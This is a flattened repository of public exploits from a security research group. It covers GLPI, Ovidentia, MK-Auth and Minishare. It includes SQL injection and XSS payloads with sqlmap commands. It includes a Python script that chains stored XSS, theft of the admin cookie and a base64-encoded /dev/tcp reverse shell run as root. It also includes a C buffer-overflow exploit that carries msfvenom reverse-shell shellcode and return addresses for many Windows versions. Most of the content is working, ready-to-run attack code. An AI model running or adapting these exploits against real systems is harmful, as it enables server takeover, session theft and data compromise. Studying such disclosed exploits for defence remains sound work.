├── README.md ├── cms ├── GLPI │ ├── GLPI-stored-XSS │ │ └── README.md │ └── dashboard-plugin │ │ └── README.md └── ovidentia │ ├── exploitSQLIOvidentia.txt │ └── exploitXSSOvidentia.txt ├── mk-auth ├── Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf └── xss2root.py └── windows └── servers └── minishare └── minishare_141_xpl.c /README.md: -------------------------------------------------------------------------------- 1 |

2 | Pentest Cheat Sheets 3 |

4 | 5 | ## Public Exploits 6 | 7 | This repository cotains public exploits written by UserX and N3k00n3. 8 | 9 | ## Exploits 10 | 11 | * CMS 12 | * [XSS - Ovidentia 8.4.3](./cms/ovidentia/exploitXSSOvidentia.txt) 13 | * [SQLi - Ovidentia 8.4.3](./cms/ovidentia/exploitSQLIOvidentia.txt) 14 | * Servers 15 | * [Minishare](./windows/server/minishare/minishare_141_xpl.c) 16 | -------------------------------------------------------------------------------- /cms/GLPI/GLPI-stored-XSS/README.md: -------------------------------------------------------------------------------- 1 | # XSS Stored via Plugin metadata. 2 | 3 | Author: Fernando Pinheiro 4 | GLPI version: >= 9.5.4 5 | 6 | 7 | It was possible to insert JavaScript codes into plugins metadata as Author, version,license and so on... 8 | 9 | Once the plugin is sent to the plugins folder at /glpi/plugins 10 | 11 | This code will be loaded into GLPI plugin instalation. Once the glpi read this information from the file and doesn't sanitize what will be rendered. 12 | 13 | 14 | -------------------------------------------------------------------------------- /cms/GLPI/dashboard-plugin/README.md: -------------------------------------------------------------------------------- 1 | # Information Disclose 2 | Plugin Name: DashBoard 3 | Plugin Version: <=1.0.2 4 | 5 | Para quem viu o post sobre [arquivos de log do GLPI](https://medium.com/@emmapinheiro42/glpi-pesquisa-parte-02-1cb3a2b95a92) que geralmente são esquecidos com permissões de leitura e são de grande ajuda para enumeração de usuários. 6 | 7 | Hoje vou trazer uma forma interessante de ver esse mesmo arquivo de forma autenticada com usuário de poucos privilégios, uma maneira de bypass para quando esse arquivo estiver com as devidas proteções. 8 | 9 | O GLPI permite o uso de plugins que podem ser encontrados em diversos lugares, mas é mais comum no github e no [site oficial](https://plugins.glpi-project.org/#/) de plugins. 10 | 11 | Se procuramos por Dashboard, vamos encontrar um dos plugins mais usados por quem implementa o GLPI. Esse plugin é escrito e mantido por [stdonato](https://github.com/stdonato/glpi-dashboard/). 12 | 13 | 14 | O caminho para os plugins do GLPI é na pasta plugins: 15 | https://example.com/glpi/plugins/ 16 | 17 | Geralmente essa pasta é usada depois da instalação do GLPI e acaba sendo esquecida de ser protegida, com a listagem de diretórios se torna fácil a enumeração de plugins usados. 18 | 19 | 20 | Notando que existe o plugin dashboard é possível ver os últimos 10 eventos, o que um usuário comum não teria acesso direto para o arquivo 21 | glpi/front/event.php, agora pode acessar esses mesmos eventos por meio do arquivo main2.php que fica na pasta /plugins/dashboard/front/main2.php. 22 | 23 | Além de poder observar os eventos, usuários com baixo privilégios também tem acesso para outras informações úteis e que não deveriam ser acessadas por eles, como por exemplo: 24 | 25 | * quem está conectado no momento 26 | * Quem são os técnicos da aplicação por meio dos chamados abertos por eles na categoria tech. 27 | * últimos chamados de outros clientes 28 | * Quantos usuários existem atualmente no banco. 29 | -------------------------------------------------------------------------------- /cms/ovidentia/exploitSQLIOvidentia.txt: -------------------------------------------------------------------------------- 1 | #------------------------------------------------------- 2 | # Exploit Title: Ovidentia CMS - SQL Injection (Authenticated) 3 | # Date: 06/05/2019 4 | # [ CVE-2019-13978 ] 5 | # Exploit Author: 6 | # Fernando Pinheiro (n3k00n3) 7 | # Victor Flores (UserX) 8 | # Vendor Homepage: https://www.ovidentia.org/ 9 | # Version: 8.4.x < 8.6.4 10 | # Tested on: Mac,linux - Firefox, safari 11 | # Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893 12 | # 13 | # [ Kitsun3Sec Research Group ] 14 | #-------------------------------------------------------- 15 | 16 | POC 17 | 18 | Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1 19 | Type: GET 20 | Vulnerable Field: id 21 | Payload: 22 | 1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT 23 | 2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg) 24 | 25 | URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1 26 | 27 | Using Request file 28 | sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs 29 | 30 | Using Get 31 | ./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs 32 | 33 | --- 34 | 35 | [CHANGELOG] 36 | 37 | 4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable. 38 | -------------------------------------------------------------------------------- /cms/ovidentia/exploitXSSOvidentia.txt: -------------------------------------------------------------------------------- 1 | #------------------------------------------------------- 2 | # Exploit Title: Ovidentia CMS - XSS Ovidentia 8.4.3 3 | # The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. 4 | # Date: 06/05/2019 5 | # [ CVE-2019-13977 ] 6 | # Exploit Author: 7 | # Fernando Pinheiro (n3k00n3) 8 | # Victor Flores (UserX) 9 | # Vendor Homepage: https://www.ovidentia.org/ 10 | # Version: 8.4.3 <= 8.6.4 11 | # Tested on: Mac,linux - Firefox, safari 12 | # Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893 13 | # 14 | # [ Kitsun3Sec Research Group ] 15 | #-------------------------------------------------------- 16 | 17 | POC 18 | 19 | >======================================================== 20 | Stored XSS 21 | >======================================================== 22 | 23 | 1. POST http://TARGET/ovidentia/index.php?tg=groups 24 | Field: 25 | nom 26 | 2. POST http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y 27 | Fields: 28 | Nom 29 | Description 30 | 3. GET http://TARGET/ovidentia/index.php?tg=delegat 31 | Show groups 32 | 4. POST http://TARGET/ovidentia/index.php?tg=site&idx=create 33 | http://TARGET/ovidentia/index.php?tg=site&item=4 34 | Fields: 35 | Nom 36 | address 37 | description 38 | 5. POST http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1 39 | Fields: 40 | Libellé du champ 41 | Explosion: 42 | http://TARGET/ovidentia/index.php?tg=forums&idx=notices 43 | http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1 44 | http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1 45 | 6. POST http://TARGET/ovidentia/index.php?tg=notes&idx=Create 46 | Fields: Notes 47 | Explosion: 48 | http://TARGET/ovidentia/index.php?tg=notes&idx=List 49 | 50 | 7. POST http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add 51 | Fields: all 52 | Explosion: 53 | http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2 54 | 55 | 56 | >======================================================== 57 | REFLECTED 58 | >======================================================== 59 | 60 | 1. GET http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E 61 | 62 | 63 | --- 64 | 65 | 66 | [CHANGELOG] 67 | 68 | 4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable. 69 | -------------------------------------------------------------------------------- /mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kitsun3Sec/exploits/2901f6d654f3f0c4f58f43be04ef7bfdf552647c/mk-auth/Mk-Auth_RCE_via_Profile_Photo_Upload_Feature.pdf -------------------------------------------------------------------------------- /mk-auth/xss2root.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # 0day - Authenticated Stored XSS that leads to root! 4 | # 5 | import requests 6 | import sys 7 | import getopt 8 | import re 9 | import os 10 | import threading 11 | import socket 12 | import base64 13 | 14 | kitsun3 = ''' 15 | @@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@@@@@@@@@@@&&@@@@@@@@@@@@@@@ 16 | @@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&@@@@@@@@@@@@@ 17 | @@@@@@@@@@@@#&&&&&&&&@@@@@@@@@@@@@@@@@@@@&&&&&&&@@@@@@@@@@@@ 18 | @@@@@@@@@@@@&&&. .&&&&@@@@@@@@@@@@@@@@@@&&&. .&&&@@@@@@@@@@@ 19 | @@@@@@@@@@@&&&& &&&&&@@@@@@@@@@@@@@@&&&&& &&&&@@@@@@@@@@ 20 | @@@@@@@@@@@&&&.. ,%&&&&@%%%%%%%%%%%@&&&&&, ..&&&@@@@@@@@@@ 21 | @@@@@@@@@@&%%%..* *#%%%%*************%%%%%* *..%%%@@@@@@@@@@ 22 | @@@@@@@@%%%%%%.*******************************.%%%%%%@@@@@@@ 23 | @@@@@@@@%,..**************************************..%@@@@@@@ 24 | @@@@@@@@@%*.***************************************%@@@@@@@@ 25 | @@@@@@@%%.(#.*************,*******,*************.,(.%%@@@@@@ 26 | @@@@@@@%..,,.*.****((****, ,*****, ,****/#****.*..,..%@@@@@@ 27 | @@@@@@@@@%*...*****%&&*****************#&&*****...*%@@@@@@@@ 28 | @@@@@@@@%%%%%%..****(&&***************&&%****..%%%%%%@@@@@@@ 29 | @@@@@@@@@%*......******&*************&/*****......*%@@@@@@@@ 30 | @@@@@@@@@@@@@@%###..,********************,.###%@@@@@@@@@@@@@ 31 | @@@@@@@@@@@@@@@@@@@@%%.***************.(&@@@@@@@@@@@@@@@@@@@ 32 | @@@@@@@@@@@@@@@@@@@@@@@%.***********.%@@@@@@@@@@@@@@@@@@@@@@ 33 | @@@@@@@@@@@@@@@@@@@@@@@@%.*********.%@@@@@@@@@@@@@@@@@@@@@@@ 34 | @@@@@@@@@@@@@@@@@@@@@@@@@@#.&&&&&.#@@@@@@@@@@@@@@@@@@@@@@@@@ 35 | @@@@@@@@@@@@@@@@@@@@@@@@@@@@%%%%%@@@@@@@@@@@@@@@@@@@@@@@@@@@ 36 | ''' 37 | 38 | target = '' 39 | cookies = '' 40 | user = '' 41 | password = '' 42 | local_port = '' 43 | local_ip = '' 44 | admin_cookie = 'Kitsun3Sec' 45 | payload = '' 46 | 47 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": target+"/central/executar_login.php", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Pragma": "no-cache", "Cache-Control": "no-cache"} 48 | 49 | def show_help(): 50 | print("\n\t*********************************") 51 | print("\t MK-Auth Exploit by Kitsun3Sec ") 52 | print("\t By: alacerda (velocista) ") 53 | print("\t Thanks to: fcsantos (shadow) ") 54 | print("\t*********************************") 55 | print("\nINFO:\n\nThis exploit opens up a temporary listener on port 8081 to steal the Administrator's auth cookie and, after that, starts a netcat listener on the port choosen by the attacker and waits for the moment when the administrator opens the malicious message (a bad \"chamado\"). Once the Administrator opens the message, you will receive a root shell back!\n") 56 | print("Usage.: " + sys.argv[0] + " \n") 57 | print("ARGS:") 58 | print("\t-t:\t Target IP address (Mk-Auth IP)") 59 | print("\t-l:\t Local IP address (Your IP)") 60 | print("\t-p:\t Local PORT for Reverse Shell") 61 | print("\t-U:\t Username (valid client username)") 62 | print("\t-P:\t Password (valid password for the client)") 63 | print("\t-h:\t This help") 64 | 65 | print("\nEXAMPLE\n") 66 | print("If the target server has the IP address 192.168.25.136, your IP address is 192.168.25.137 and you want to receive the reverse shell on port 9090:\n") 67 | print("\t" + sys.argv[0] + " -t 192.168.25.136 -U myuser -P password123 -l 192.168.25.137 -p 9090") 68 | 69 | print("\n") 70 | sys.exit(0) 71 | 72 | def open_reverse(): 73 | url = target+"/admin/terminal.php" 74 | goodEvil = base64.b64encode("sudo bash -i >& /dev/tcp/" + local_ip +"/" + local_port + " 0>&1") 75 | data = {"comando": "sleep 5; echo " + goodEvil + " | base64 -d | bash", "terminal": "linux"} 76 | target_resp = requests.post(url, headers=headers, cookies=admin_cookie, data=data) 77 | 78 | def goingForTheKill(): 79 | ists = threading.Thread(target=open_reverse) 80 | ists.start() 81 | os.system("nc -nlvp " + local_port) 82 | 83 | def listen_admin_cookie(): 84 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 85 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 86 | sock.bind(("",8081)) 87 | sock.listen(1) 88 | connection, client_address = sock.accept() 89 | return connection.recv(1024) 90 | 91 | def wait_admin(): 92 | global admin_cookie 93 | 94 | while "centralmka2" not in admin_cookie: 95 | admin_cookie = listen_admin_cookie() 96 | 97 | tmp = admin_cookie 98 | admin_cookie = {"centralmka2": tmp.split()[1].split('=')[1].split(';')[0], "mka": tmp.split()[1].split('=')[2]} 99 | 100 | print("We just recieved a cookie... Lets try it!") 101 | goingForTheKill() 102 | 103 | def abrir_chamado(): 104 | url = target+"/central/suporte.php?page=ins_chamado" 105 | chamado_resp = requests.get(url, headers=headers, cookies=cookies) 106 | 107 | protocolo = re.findall(r'.*txt_chamado" value="(.*)"', chamado_resp.text) 108 | print("Chamado N.: " + protocolo[0]) 109 | 110 | url = target+"/central/executar_central.php?acao=ins_chamado" 111 | data = {"assunto": "Financeiro", "msg": payload, "nome": "Kitsun3Sec", "email": "kitsun3@sec.br", "chamado": protocolo[0], "abertura": "22/03/2020 21:37:42"} 112 | criar_resp = requests.post(url, headers=headers, cookies=cookies, data=data) 113 | #print(criar_resp.text) 114 | if criar_resp.status_code == 200: 115 | print("Payload sent.Let us wait for the admin token...") 116 | wait_admin() 117 | 118 | def login(): 119 | global cookies 120 | url = target+"/central/login.php" 121 | resp = requests.get(url, headers=headers) 122 | 123 | #Cookies @ resp.cookies 124 | cookies = resp.cookies 125 | 126 | #CSRF-Token @ csrf_token[0] 127 | csrf_token = re.findall(r'.*token_central" value="(.*)"', resp.text) 128 | 129 | url = target+"/central/executar_login.php" 130 | data = {"token_central": csrf_token[0], "txt_login": user, "txt_senha": password} 131 | login_resp = requests.post(url, headers=headers, cookies=cookies, data=data) 132 | 133 | if login_resp.status_code == 200: 134 | print(" \\0/") 135 | print("We are logged in!") 136 | abrir_chamado() 137 | else: 138 | print("':( ") 139 | print("Login Failed! Are you sure your credential is valid?") 140 | 141 | def main(argv): 142 | print(kitsun3) 143 | global target 144 | global user 145 | global password 146 | global local_port 147 | global local_ip 148 | global payload 149 | 150 | try: 151 | opts, args = getopt.getopt(argv,"t:l:p:hU:P:") 152 | except getopt.GetoptError: 153 | show_help() 154 | 155 | for opt, arg in opts: 156 | if opt == '-h': 157 | show_help() 158 | # target 159 | elif opt == '-t': 160 | target = "http://"+arg 161 | # Local IP 162 | elif opt == '-l': 163 | local_ip = arg 164 | payload = "" 165 | # Local port for reverse shell 166 | elif opt == '-p': 167 | local_port = arg 168 | elif opt == '-U': 169 | user = arg 170 | elif opt == '-P': 171 | password = arg 172 | else: 173 | show_help() 174 | 175 | login() 176 | 177 | if __name__ == "__main__": 178 | if len(sys.argv) < 2: 179 | show_help() 180 | main(sys.argv[1:]) 181 | -------------------------------------------------------------------------------- /windows/servers/minishare/minishare_141_xpl.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Exploit Title: Minishare 1.4.1 RCE exploit 3 | * Date: 17th of April of 2019 4 | * Exploit Author: Victor Vigel Flores 5 | * Vendor Homepage: https://sourceforge.net/projects/minishare/ 6 | * Software Link: https://sourceforge.net/projects/minishare/ 7 | * Version: 1.4.1 8 | * Tested on: Microsoft Windows 2000 ~ XP-SP3 9 | * CVE : 2004-2271 10 | */ 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | #include 25 | 26 | #define SA struct sockaddr 27 | #define SA_IN struct sockaddr_in 28 | 29 | #define BUFF_ERR_LENGTH 1787 30 | #define PAYLOAD_LENGTH 2500 31 | 32 | #define GET "GET " 33 | #define HTTP " HTTP/1.1\r\n\r\n" 34 | 35 | void generate_random_text(char * str, size_t size); 36 | char * mount_payload(const int target); 37 | int createSocket (const char * target, const int port); 38 | 39 | /* 40 | * msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=1337 41 | * EXITFUNC=thread -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40" 42 | * -f c -v payload 43 | */ 44 | unsigned char pload[] = 45 | "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e" 46 | "\xb7\xa7\xaa\x94\x83\xee\xfc\xe2\xf4\x4b\x4f\x28\x94\xb7\xa7" 47 | "\xca\x1d\x52\x96\x6a\xf0\x3c\xf7\x9a\x1f\xe5\xab\x21\xc6\xa3" 48 | "\x2c\xd8\xbc\xb8\x10\xe0\xb2\x86\x58\x06\xa8\xd6\xdb\xa8\xb8" 49 | "\x97\x66\x65\x99\xb6\x60\x48\x66\xe5\xf0\x21\xc6\xa7\x2c\xe0" 50 | "\xa8\x3c\xeb\xbb\xec\x54\xef\xab\x45\xe6\x2c\xf3\xb4\xb6\x74" 51 | "\x21\xdd\xaf\x44\x90\xdd\x3c\x93\x21\x95\x61\x96\x55\x38\x76" 52 | "\x68\xa7\x95\x70\x9f\x4a\xe1\x41\xa4\xd7\x6c\x8c\xda\x8e\xe1" 53 | "\x53\xff\x21\xcc\x93\xa6\x79\xf2\x3c\xab\xe1\x1f\xef\xbb\xab" 54 | "\x47\x3c\xa3\x21\x95\x67\x2e\xee\xb0\x93\xfc\xf1\xf5\xee\xfd" 55 | "\xfb\x6b\x57\xf8\xf5\xce\x3c\xb5\x41\x19\xea\xcf\x99\xa6\xb7" 56 | "\xa7\xc2\xe3\xc4\x95\xf5\xc0\xdf\xeb\xdd\xb2\xb0\x58\x7f\x2c" 57 | "\x27\xa6\xaa\x94\x9e\x63\xfe\xc4\xdf\x8e\x2a\xff\xb7\x58\x7f" 58 | "\xc4\xe7\xf7\xfa\xd4\xe7\xe7\xfa\xfc\x5d\xa8\x75\x74\x48\x72" 59 | "\x3d\xfe\xb2\xcf\xa0\x9f\xb7\xfb\xc2\x96\xb7\xa2\x93\x1d\x51" 60 | "\xcd\xba\xc2\xe0\xcf\x33\x31\xc3\xc6\x55\x41\x32\x67\xde\x98" 61 | "\x48\xe9\xa2\xe1\x5b\xcf\x5a\x21\x15\xf1\x55\x41\xdf\xc4\xc7" 62 | "\xf0\xb7\x2e\x49\xc3\xe0\xf0\x9b\x62\xdd\xb5\xf3\xc2\x55\x5a" 63 | "\xcc\x53\xf3\x83\x96\x95\xb6\x2a\xee\xb0\xa7\x61\xaa\xd0\xe3" 64 | "\xf7\xfc\xc2\xe1\xe1\xfc\xda\xe1\xf1\xf9\xc2\xdf\xde\x66\xab" 65 | "\x31\x58\x7f\x1d\x57\xe9\xfc\xd2\x48\x97\xc2\x9c\x30\xba\xca" 66 | "\x6b\x62\x1c\x4a\x89\x9d\xad\xc2\x32\x22\x1a\x37\x6b\x62\x9b" 67 | "\xac\xe8\xbd\x27\x51\x74\xc2\xa2\x11\xd3\xa4\xd5\xc5\xfe\xb7" 68 | "\xf4\x55\x41"; 69 | 70 | const char nops[] = 71 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 72 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 73 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 74 | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 75 | "\x90"; 76 | 77 | 78 | const char * targets[] = { 79 | "\xab\xa3\x54\x77", // Windows 2000 SP0->SP3 English */ 80 | "\x64\xf1\x17\x75", // Windows 2000 SP4 English */ 81 | "\x54\x1d\xab\x71", // Windows XP SP0-SP1 English */ 82 | "\x72\x93\xab\x71", // Windows XP SP2 English */ 83 | "\x4d\x3c\xc0\x71", // Windows 2003 SP0 English */ 84 | "\x80\x36\x40\x77", // Windows 2003 SP1 English */ 85 | "\x80\x26\x40\x77", // Windows 2003 SP2 English */ 86 | "\xf8\x29\xf3\x77", // Windows NT 4.0 SP6 */ 87 | "\x0a\xaf\xd5\x77", // Windows XP SP2 German */ 88 | "\x6e\xe2\xd4\x77", // Windows XP SP2 Polish */ 89 | "\x0a\xaf\xd5\x77", // Windows XP SP2 French */ 90 | "\x53\x93\x3a\x7e" // Windows XP SP3 French */ 91 | }; 92 | 93 | int 94 | createSocket(const char * target, const int port) { 95 | int sockfd = socket (AF_INET, SOCK_STREAM, 0); 96 | if (sockfd < 0) { 97 | perror ("unable to create socket"); 98 | exit(EXIT_FAILURE); 99 | } 100 | 101 | SA_IN hostaddr; 102 | bzero(&hostaddr, sizeof(hostaddr)); 103 | hostaddr.sin_family = AF_INET; 104 | hostaddr.sin_addr.s_addr = inet_addr (target); 105 | hostaddr.sin_port = htons (port); 106 | 107 | if (connect (sockfd, (SA *)&hostaddr, sizeof (hostaddr)) != 0) { 108 | perror ("trying to reach the target"); 109 | exit(EXIT_FAILURE); 110 | } 111 | return sockfd; 112 | } 113 | 114 | void 115 | generate_random_text(char * str, size_t size) { 116 | const char alphabet[] = "ABCDEFGHIJKLMNOPQRSTUVXWYZabcdefghijklmnopqrstuvxwyz"; 117 | 118 | srand(time(NULL)); 119 | for (size_t i = 0; i < size; i++) { 120 | str[i] = alphabet[rand() % strlen(alphabet)]; 121 | } 122 | str[size] = 0x00; 123 | } 124 | 125 | char * 126 | mount_payload (const int target) { 127 | if (target < 0 || target > 11) { 128 | fprintf (stderr, "Invalid OS target [!!]\n"); 129 | exit (EXIT_FAILURE); 130 | } 131 | 132 | char * payload = (char *) calloc (PAYLOAD_LENGTH, sizeof (char)); 133 | char rand_text[BUFF_ERR_LENGTH]; 134 | generate_random_text (rand_text, BUFF_ERR_LENGTH); 135 | sprintf(payload, "%s%s%s%s%s", GET, rand_text, targets[target], nops, pload); 136 | 137 | int len = strlen(payload); 138 | int remain = PAYLOAD_LENGTH - len - 13; 139 | 140 | for (int i = 0; i < remain; i++) { 141 | payload[(len)+i] = 'B'; 142 | } 143 | 144 | strncat (payload, HTTP, PAYLOAD_LENGTH); 145 | 146 | return payload; 147 | } 148 | 149 | int 150 | main(int argc, char ** argv) { 151 | 152 | if (argc < 4) { 153 | printf ("Usage: %s \n", argv[0]); 154 | exit (EXIT_SUCCESS); 155 | } 156 | char * payload = mount_payload (atoi(argv[3])); 157 | int sockfd = createSocket (argv[1], atoi(argv[2])); 158 | 159 | write (sockfd, payload, strlen(payload)); 160 | 161 | free (payload); 162 | close(sockfd); 163 | 164 | return 0; 165 | } 166 | --------------------------------------------------------------------------------